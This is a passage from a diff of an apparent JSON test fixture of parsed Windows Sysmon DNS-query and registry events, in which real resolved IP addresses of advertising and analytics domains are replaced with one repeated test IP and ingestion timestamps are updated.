"event", "created": "2019-07-18T03:34:03.028Z", @@ -1799,12 +1791,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1819,13 +1811,13 @@ "lg3.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313761551Z", + "ingested": "2021-12-09T13:49:44.739168400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1889,22 +1881,22 @@ "type": "CNAME" }, { - "data": "54.88.96.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.100.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.209.58.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -1920,15 +1912,13 @@ "service.sp.advertising.com" ], "ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313762836Z", + "ingested": "2021-12-09T13:49:44.739172600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -1988,7 +1978,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313764073Z", + "ingested": "2021-12-09T13:49:44.739177500Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.723248500Z'/\u003e\u003cEventRecordID\u003e2686\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2057,12 +2047,12 @@ "type": "CNAME" }, { - "data": "184.25.176.117", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "network": { @@ -2079,13 +2069,13 @@ "sb.scorecardresearch.com" ], "ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313765262Z", + "ingested": "2021-12-09T13:49:44.739183100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2153,12 +2143,12 @@ "type": "CNAME" }, { - "data": "40.114.54.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "network": { @@ -2175,13 +2165,13 @@ "otf.msn.com" ], "ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313766453Z", + "ingested": "2021-12-09T13:49:44.739187100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2247,7 +2237,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313767748Z", + "ingested": "2021-12-09T13:49:44.739190900Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.726009900Z'/\u003e\u003cEventRecordID\u003e2687\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 2\u003c/Data\u003e\u003cData Name='Details'\u003eQWORD (0x00000000-0x00000005)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2308,7 +2298,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313768938Z", + "ingested": "2021-12-09T13:49:44.739194700Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818821400Z'/\u003e\u003cEventRecordID\u003e2690\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\ertrqvg.rkr\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2369,47 +2359,47 @@ }, "answers": [ { - "data": "35.171.101.225", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.196.57.87", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.164.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.181.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.167.169", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.242.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.234.152.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.206.12.124", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -2424,20 +2414,13 @@ "ping.chartbeat.net" ], "ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313770065Z", + "ingested": "2021-12-09T13:49:44.739199300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2496,27 +2479,27 @@ }, "answers": [ { - "data": "151.101.194.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.79", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -2531,16 +2514,13 @@ "clarium.freetls.fastly.net" ], "ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313771215Z", + "ingested": "2021-12-09T13:49:44.739203700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 